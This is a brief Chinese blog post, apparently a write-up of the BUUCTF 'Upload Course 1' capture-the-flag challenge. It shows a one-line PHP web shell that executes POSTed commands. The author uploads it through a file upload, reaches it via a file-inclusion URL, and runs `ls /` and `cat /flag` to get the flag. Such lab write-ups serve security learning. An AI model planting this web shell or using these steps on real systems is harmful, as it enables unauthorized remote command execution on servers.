buuctf
in 默认分类 with 0 comment
buuctf
in 默认分类 with 0 comment

BUU UPLOAD COURSE 1

传入后门,打开蚁剑
2024-06-30T12:11:18.png
发现连接失败
于是传入另一个shell

<?php @eval(system($_POST["x"]));?>

这里是一个远程代码执行漏洞
我们可以传入x来执行命令
打开postman
2024-06-30T12:15:48.png
路径为http://a7f55388-e404-4535-ae79-ed92f0cf7b87.node5.buuoj.cn:81/index.php?file=uploads/668141e081aba.jpg
传入x为ls /,查看文件
2024-06-30T12:20:57.png
查找到了flag
传入x为cat /flag
2024-06-30T12:21:49.png
找到flag=flag{caab5a5b-b834-4dde-a4a5-724a2ed3c52b}

The article has been posted for too long and comments have been automatically closed.